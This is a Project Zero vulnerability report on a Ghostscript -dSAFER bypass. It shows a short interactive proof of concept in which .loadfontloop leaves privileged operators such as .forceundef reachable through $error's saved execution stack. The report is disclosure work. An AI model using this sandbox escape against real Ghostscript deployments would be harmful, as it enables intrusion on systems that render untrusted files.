ghostscript: .loadfontloop exposes system operators in saved execution stack. 




While testing the fix for <a href="/p/project-zero/issues/detail?id=1690" title="ghostscript: $error object can expose system operators in saved execution stack." class="closed_ref" rel="nofollow"> bug 1690 </a>, I found a variation that still works:

$ ./gs -dSAFER -sDEVICE=ppmraw 
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>systemdict /.loadfontloop get stopped == clear
true
GS>$error /estack get 27 get 18 get 14 get ==
--.forceundef--
GS>

.forceundef is bad enough, but .putgstringcopy is also in there, which is basically a wrapper around .forceput.

Filed upstream as <a href="https://bugs.ghostscript.com/show_bug.cgi?id=699938" title="" class="" rel="nofollow">https://bugs.ghostscript.com/show_bug.cgi?id=699938</a>

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.




Found by: taviso